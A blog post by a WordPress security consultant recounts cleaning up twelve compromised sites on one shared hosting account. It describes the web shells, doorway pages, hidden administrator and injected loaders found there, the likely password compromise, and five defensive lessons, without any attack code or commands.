«12 sites — one password. Zero effort from the hacker — zero chances for the owner»
A story that could happen to anyone
Recently, I cleaned up a massive infection of twelve WordPress sites living on a single hosting account. Someone had added pages that never existed. Mysterious files with strange names appeared everywhere. Google started showing content about online casinos and cryptocurrency schemes under these domains in search results. The sites themselves were barely breathing, working intermittently, and the host was on the verge of blocking them completely.
The work was intense, the result was clean sites and a pile of conclusions worth sharing.
Anatomy of the breach: what we found on the server
When I got access to the server, the picture was… telling. All twelve sites lived on a single virtual hosting account (shared hosting), under one system account. One password — and the attacker had access to everything. Like a single key to a twelve-apartment building.
What was next? Grab some tea, get comfortable — because the list of what we found there is shocking.
Doorway pages — 182 pieces
Throughout WordPress — in wp-admin, wp-includes, wp-content — folders appeared with numeric names, containing index.php files. These are so-called doorway pages — ghost pages that exist only for search engine crawlers. Google indexes them, sees a «trustworthy» domain, and starts showing spam in search results. The site owner might not know for months that their domain is working for someone else’s casino. Good luck with that!
Web shells — 9+ copies
A web shell is essentially a backdoor to your server. A small PHP script through which a hacker can remotely execute any command: read files, upload new ones, delete, modify — anything they want. And we found nine such «back doors».
Files with names like clasa99.php, astar.php, proccess_config.php — scattered across various directories. Some were disguised as CSS files (editorm.css.php in /wp-includes/blocks/avatar/). One had AES encryption — this is no longer amateur work, but a tool from the arsenal for selling access on hacker forums.
Fake plugins
Directories appeared in the plugins folder that imitated legitimate extensions. Inside — PHP files of 50–60 KB, filled with obfuscated code — intentionally convoluted so that neither a person nor an antivirus could quickly understand what it does. WordPress sees them as «plugins», and the admin might not even notice an extra line in the list. Like an extra tenant in an apartment that no one invited, but quietly lives there and eats from your fridge.
Injections in themes
In six themes, the functions.php file was modified. Code was added in Indonesian (comments like «Memanggil file backlink»), which through the wp_footer hook loaded the backlink.php file — an injection of external links in the site footer. Each page visit generated invisible SEO links to the attacker’s client sites.
Hidden administrator
In mu-plugins lay a file called jetpack-performance.php — a name that raises no suspicions. But inside — a filter that hid a specific user from the admin panel. The hacker created an administrator account for themselves, then made it invisible. Even if you go to «Users» — you won’t see it. It simply doesn’t exist in your interface. But it does. Sitting quietly in your apartment, eating your borscht, sleeping in your bed — and you don’t even suspect it’s there. Audacity? No. This is a business model.
Infected root files
In each index.php in the root directory, code was embedded that loaded a payload from an external server. This allowed the hacker to change the behavior of the sites without rebreaching — today a redirect to a casino, tomorrow a cryptominer, the day after a phishing page. A remote control for your site — just in someone else’s hands.
Hacker accounts
On most sites, hacker administrator accounts were created. And on one site, we discovered 232 spam accounts. Two hundred thirty-two. On one site. Isn’t it getting crowded in there, guys? 😄
Who is behind this and why
Judging by the comments in the code in Indonesian — the trail leads to Southeast Asia. But don’t imagine a movie hacker in a hoodie, drinking coffee at night and grinning menacingly at a monitor. This is a conveyor. Business. Very profitable business.
The breach is massive and automated. Bots scan millions of servers, try typical passwords, or use leak databases. One stolen password — and an automatic script infects all sites on the account within minutes.
And then — monetization. Layered like an onion.
Doorway pages are sold to spam customers in batches: «1000 doorways on trustworthy domains — $300». Backdoors are resold separately — access to a hacked server on a hacker forum costs $5 to $50 per piece. Backlink injections — that’s a separate service for «black SEO». And if all else fails — you can always deploy a cryptominer or use the server for DDoS attacks.
One hacked account with twelve sites — this isn’t an «incident». This is an asset that generates income for several different buyers simultaneously.
Why this happened: no geniuses, just negligence
There are no SQL injections or complex zero-day exploits here. It’s all much more mundane. And that’s precisely what makes this story so painful.
All signs point to FTP/SSH password compromise. Identical infection pattern on all twelve sites — one automatic pass through the file system. Modified WordPress core files — such a thing is impossible through a plugin vulnerability, you need direct file access. Files created on behalf of the hosting system user.
How did the leak happen? There are several typical scenarios.
Weak or reused password. If you use the same password for FTP and for registration on some forum — sooner or later it will end up in a leak database.
FTP client as the weakest link. FileZilla and similar clients store passwords in plain text in XML files on your computer. One info-stealing trojan — and all your accounts are compromised.
Phishing. A fake hosting control panel login page — looks identical, but sends your data somewhere completely different than you think.
And then — shared hosting did its job. Twelve sites under one system account. One password = full access to everything. Like one key to the entire building — to apartments, basements, and attics.
And one more point I can’t help but mention: the server was running PHP 7.3–7.4. PHP 7.3 hasn’t been updated since December 2021, PHP 7.4 — since November 2022. That means years without a single security patch. By 2026, the standard is PHP 8.3+. Three to four years without patches — this is a gift for any bot scanning servers.
How I treated these sites
The cleanup process took several hours of intensive work. Several very intense hours. In short — here’s what had to be done:
- Found and deleted all malicious files — web shells, fake plugins, doorway pages, backdoors in mu-plugins, infected
index.phpand backlink injections in themes - Deleted hacker accounts from the databases of all sites
- Downgraded suspicious «system» accounts to subscriber role
- Regenerated WordPress secret keys (salt keys) — this logs out all active sessions, including hacker ones
- Blocked PHP execution in the
uploadsdirectory - Disabled file editing through the admin panel
- Restored corrupted theme files
That was the technical part. But without changing the approach to security — all of this will have to be repeated again and again.
Five lessons that cost a sleepless night
I prepared a detailed WordPress security checklist for 2026 — available on my educational portal: WordPress Security Checklist (2026). It has everything — from wp-config.php configuration to security header settings and WAF.
But if I highlight the most important takeaways from this story — here are five conclusions.
One password — one point of failure. If ten sites live on your hosting under one account — compromising one password means compromising everything. Use SSH keys instead of passwords. If passwords — only unique, only complex, only through a password manager. And never — never — store them in FileZilla or other FTP clients.
PHP should be current. As I mentioned above — outdated PHP without security patches is an invitation for bots. Update to a current version, don’t delay.
Shared hosting is a shared apartment. Your sites live next to hundreds of others, and one compromised neighbor can become a problem for everyone. For serious projects, consider a dedicated server (VPS) or hosting with site isolation from each other.
Monitoring is not a luxury. The owner of these sites learned about the breach by accident — when Google was already indexing spam under their domains. If Wordfence or any other file integrity monitoring had been installed — the breach would have been detected within an hour, not months.
Backups are not «I’ll do it later». If clean backups existed — recovery would have taken minutes, not hours of manual work to find and delete each malicious file individually.
Summary
Every breach is not a technical problem. It’s a problem of priorities.
When a business decides to «save» on security, postpone updates, use one password for everything — they’re not saving. They’re taking a loan. A loan with a very high interest rate that will have to be paid not in money, but in reputation, Google rankings, client data, and sleepless nights.
Twelve sites. One night. One password.
Don’t be this case.
If your WordPress site is behaving strangely, Google is showing someone else’s content under your domain, or you just want to make sure everything is fine — contact me. I’ll conduct a security audit, find vulnerabilities, and close them before someone else exploits them. It’s better to spend an hour on a check now than several sleepless nights on treatment later.
